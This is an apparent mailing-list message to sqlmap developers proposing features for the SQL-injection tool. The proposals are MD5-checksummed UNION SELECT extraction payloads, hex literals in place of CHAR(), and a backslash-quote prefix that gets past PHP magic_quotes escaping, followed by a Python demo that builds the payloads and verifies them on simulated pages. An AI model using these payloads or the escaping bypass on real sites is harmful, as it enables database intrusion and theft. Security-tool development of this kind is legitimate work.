Hello, Miroslav!

On Wed, 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote:
> Hi Vladimir.
>
> Thank you for your report. We'll do something about it. In the meantime
> you can experiment with --technique (other than U) or --start/--stop.
>
> If there is no alternative please contact me privately and I'll make
> you a temporary patch.
>
> That idea with the end char is great. We'll try to use it in the
> detection phase.
>
> Kr
>
> On 9.8.2011. 22:34, "Vladimir Rutsky" <rutsky.vladi...@gmail.com>
> wrote:
>

Thank you for the fast reply!

I managed to get the required information without using sqlmap, so a
temporary patch is not needed; let my letter be a feature request for
future versions of sqlmap.

In my case using --start/--stop helped a little: when I provide such
options it looks like sqlmap obtains the requested rows one by one, so the
PHP script's limit of 10 items per page is never reached. But anyway sqlmap
incorrectly obtains not more than 10 columns from the table, so I can't get
a full table dump with it.

Below I assume that we are using the UNION SELECT technique.

1. How about passing, along with each item obtained from the database
through SQL injection, a checksum for that value? SQL injection with the
UNION SELECT technique by its nature gives the ability to obtain values
from the database as text (because HTTP transfers text), so you can apply
any checksum to that text. I suggest requesting a value through SQL
injection as follows (for MySQL):

    UNION SELECT CONCAT("start tag", CAST(xxx AS CHAR), MD5(CAST(xxx AS CHAR)), "end tag")

Then, if the obtained result contains text with a valid checksum between
the start and end tags, the output is definitely not corrupted or
truncated.

2. I saw that in MySQL queries you use a lot of
"CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their
length by using the hexadecimal representation of strings in MySQL, like
"CONCAT(0x3a2e79763a, ...".

3. I looked through xml/payloads.xml and didn't find prefixes for simple
WHERE clause inclusions on a PHP-powered host with magic_quotes_gpc
enabled [1]. Consider an example (PHP and MySQL):

    mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'");

When a single quote is passed through GET it is escaped: "'" -> "\'". To
work around such escaping it is enough to use a "\'" prefix in sqlmap:
"\'" -> "\\'". I suggest using "\'" prefixes in sqlmap along with "'"
prefixes.

[1] http://php.net/manual/en/security.magicquotes.php

4. I tried to get familiar with the source code of sqlmap, but despite it
being written in Python it is quite hard to read and understand without
learning the main idea and methods that are used in sqlmap. Is there any
developer documentation?

Doing SQL injection is an art in some sense, so sqlmap will never be able
to automatically hack every vulnerable site (but will help with most of
them). I think sqlmap should provide an extendable and easy to use
library, divided into several independent modules, like a module for
testing a URL for vulnerabilities, a module for fetching data from the
foreign database when a "vector" for obtaining a single item from the
database is found, and so on.

P.S. I'm new to sqlmap and probably some of my thoughts described below
don't make sense in the context of this project, or some of my ideas are
already implemented. Hope this letter will be useful.

Best wishes,
Vladimir Rutsky

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
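The checksum wrapping from point 1 and the hex string literals from point 2 of the message above, as an added example that is not part of the message and not sqlmap's own code. The tags ("::s::"/"::e::"), the column name, the row values and the three simulated HTML pages are all constructed here; `simulate_db_render` stands in for what MySQL would return for the CONCAT/MD5 expression, so the whole thing runs offline.

```python
# Added example, not from the message above or from sqlmap: the checksummed
# UNION SELECT wrapper from point 1 and the hex string literals from point 2,
# with the "page" the database output lands on constructed locally.
import hashlib


def mysql_hex_literal(s: str) -> str:
    """MySQL hex literal for a string: ':.yv:' -> '0x3a2e79763a'.

    Equivalent to CHAR(58,46,121,118,58) but shorter.  Assumes the
    connection charset is ASCII-compatible (latin1 or utf8)."""
    return "0x" + s.encode("utf-8").hex()


def checksummed_select(column: str, start: str, end: str) -> str:
    """UNION SELECT expression from point 1, with the tags written as hex
    literals (point 2).  `column` is the expression being extracted."""
    col = f"CAST({column} AS CHAR)"
    return (f"UNION SELECT CONCAT({mysql_hex_literal(start)},{col},"
            f"MD5({col}),{mysql_hex_literal(end)})")


def simulate_db_render(value: str, start: str, end: str) -> str:
    """Stand-in for what MySQL returns for that expression: the tags, the
    value and MD5() of the value (32 lowercase hex characters)."""
    digest = hashlib.md5(value.encode("utf-8")).hexdigest()
    return f"{start}{value}{digest}{end}"


def extract_verified(page: str, start: str, end: str) -> list:
    """Pull tagged values out of a page and keep only those whose embedded
    MD5 matches.  A value cut off by the application (missing end tag or
    missing digest bytes) or altered in transit is discarded rather than
    reported as data.  The tags are assumed not to occur in real data."""
    good = []
    for chunk in page.split(start)[1:]:        # text after each start tag
        if end not in chunk:                   # truncated before the end tag
            continue
        body = chunk.split(end, 1)[0]
        if len(body) < 32:                     # not even a full digest
            continue
        value, digest = body[:-32], body[-32:]
        if hashlib.md5(value.encode("utf-8")).hexdigest() == digest:
            good.append(value)
    return good


START, END = "::s::", "::e::"   # constructed tags for the demonstration


def demo() -> dict:
    """Three constructed pages: intact, truncated by the application and
    with one byte changed; returns what each yields after verification."""
    rows = ["alice", "bob", "carol"]
    intact = ("<html>"
              + "".join(simulate_db_render(r, START, END) for r in rows)
              + "</html>")
    # The application printed only part of the last row (an output limit hit
    # mid-value): the end tag for 'carol' never arrives.
    truncated = intact[: intact.rfind(END) - 10]
    # One character of 'bob' changed on the way (corruption, not truncation).
    corrupted = intact.replace(START + "bob", START + "bub", 1)
    return {
        "intact": extract_verified(intact, START, END),
        "truncated": extract_verified(truncated, START, END),
        "corrupted": extract_verified(corrupted, START, END),
    }


if __name__ == "__main__":
    print(checksummed_select("user", START, END))
    print(demo())
```

The truncated page yields only the two complete rows and the corrupted page drops the altered one, which is the property the message asks for: a client can tell "the application cut my output" from "this is the value" without any extra request. The tags are put through `mysql_hex_literal` so the payload carries no quote characters.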